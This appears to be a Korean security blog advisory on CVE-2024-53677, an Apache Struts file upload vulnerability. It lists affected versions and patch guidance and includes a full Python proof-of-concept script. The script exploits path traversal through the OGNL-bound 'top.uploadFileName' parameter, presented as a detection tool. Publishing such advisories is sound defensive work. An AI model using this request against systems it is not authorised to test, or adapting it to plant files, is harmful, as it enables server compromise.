1. CVE-2024-53677

[사진 1] CVE-2024-53677 [1]

- Apache Struts의 파일 업로드 로직의 결함으로 인한 임의 파일 업로드 취약점 (CVSS: 9.5)
> 현재 공격에 활발히 악용되는 중으로 신속한 패치 등 조치 권고

영향받는 버전
- 2.0.0 이상~2.3.37 이하 (EoL)
- 2.5.0 이상~2.5.33 이하 (EoL)
- 6.0.0 이상~6.3.0.2 이하

 

FileUploadInterceptor를 사용하는 경우만 취약점에 영향을 받음 [2]
> 공격자는 파일 업로드 매개변수를 조작하여 경로 탐색을 활성화할 수음
> 어떤 상황에서는 원격 코드 실행을 수행하는 데 사용할 수 있는 악성 파일을 업로드할 수 있음

※ 상세 내용 확인되지 않음

 

- 벤더사 제공 업데이트 적용 [3][4]

> 새로운 Action File Upload Mechanism으로 마이그레이션 권고 (이전 버전과의 호환성이 없기 때문에 새로운 코드 리팩토링 필요)

제품명 영향받는 버전 해결 버전
Apache Struts 2.0.0 이상~2.3.37 이하 (EoL)
2.5.0 이상~2.5.33 이하 (EoL)
6.0.0 이상~6.3.0.2 이하		 6.4.0 이상

2. PoC

- 파일 업로드 기능을 사용해 ../를 포함한 임의의 파일 업로드 시도 [5]

import requests
import argparse
import logging
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random

# Configure logging
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s [%(levelname)s] %(message)s",
    handlers=[logging.StreamHandler()]
)

def detect_vulnerability(target_url, upload_endpoint):
    """
    Non-destructive detection of CVE-2024-53677.
    """
    logging.info("Starting detection for CVE-2024-53677 (S2-067)...")
    upload_url = urljoin(target_url, upload_endpoint)
    test_filename = "../../vuln_test.txt"
    harmless_content = "S2-067 detection test."

    # Attempt to overwrite file name using OGNL binding
    files = {
        "upload": ("test.txt", harmless_content, "text/plain"),
        "top.uploadFileName": test_filename  # Attempt filename overwrite
    }

    # Custom Content-Type boundary
    boundary = "----WebKitFormBoundary" + "".join(random.choices("abcdefghijklmnopqrstuvwxyz0123456789", k=16))
    m = MultipartEncoder(fields=files, boundary=boundary)
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": m.content_type
    }

    logging.info(f"Sending test request to upload endpoint: {upload_url}")

    try:
        # Send file upload request
        response = requests.post(upload_url, headers=headers, data=m, timeout=10)

        # Analyze HTTP response
        if response.status_code == 200:
            logging.info("[INFO] File upload request succeeded.")
            if "vuln_test.txt" in response.text:
                logging.warning("[ALERT] File name overwrite detected. Target may be vulnerable!")
            else:
                logging.info("[INFO] Target does not appear vulnerable.")
        elif response.status_code in [403, 401]:
            logging.info("[INFO] Access denied. Ensure proper permissions.")
        else:
            logging.info(f"[INFO] Unexpected HTTP response: {response.status_code}")
    except requests.exceptions.RequestException as e:
        logging.error(f"[ERROR] Request failed: {e}")

def main():
    parser = argparse.ArgumentParser(description="CVE-2024-53677 (S2-067) Non-destructive Detection Tool")
    parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://example.com)")
    parser.add_argument("--upload_endpoint", required=True, help="Path to file upload endpoint (e.g., /upload.action)")
    args = parser.parse_args()

    logging.info("Starting detection process...")
    detect_vulnerability(args.url, args.upload_endpoint)
    logging.info("Detection process completed.")

if __name__ == "__main__":
    main()

3. 참고

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-53677
[2] https://struts.apache.org/core-developers/file-upload-interceptor
[3] https://cwiki.apache.org/confluence/display/WW/S2-067
[4] https://www.boho.or.kr/kr/bbs/view.do?bbsId=B0000133&pageIndex=1&nttId=71607&menuNo=205020
[5] https://github.com/TAM-K592/CVE-2024-53677-S2-067/tree/ALOK
[6] https://securityonline.info/hackers-exploit-critical-apache-struts-rce-flaw-cve-2024-53677-after-poc-exploit-release/#google_vignette
[7] https://blog.qualys.com/vulnerabilities-threat-research/2024/12/16/critical-apache-struts-file-upload-vulnerability-cve-2024-53677-risks-implications-and-enterprise-countermeasures
[8] https://www.cyber.gc.ca/en/alerts-advisories/cve-2024-53677-vulnerability-impacting-apache-struts-2#fn2
[9] https://www.bleepingcomputer.com/news/security/new-critical-apache-struts-flaw-exploited-to-find-vulnerable-servers/
[10] https://thehackernews.com/2024/12/patch-alert-critical-apache-struts-flaw.html

'취약점 > File Up&Download, Inclusion' 카테고리의 다른 글

WordPress WPLMS 플러그인 파일 업로드 취약점 (CVE-2024-56046, CVE-2024-56050, CVE-2024-56052)  (0) 2025.01.01
Cleo 제품 임의 파일 읽기/쓰기 취약점 (CVE-2024-50623)  (0) 2024.12.15
Apache Struts 파일 업로드 취약점 (CVE-2023-50164)_내용추가  (1) 2023.12.18
이니텍 INISAFE CrossWeb EX V3 파일 다운로드 취약점  (0) 2023.03.31
VMware vCenter Server 파일 업로드 취약점 (CVE-2021-21972)  (0) 2023.01.15

+ Recent posts

티스토리툴바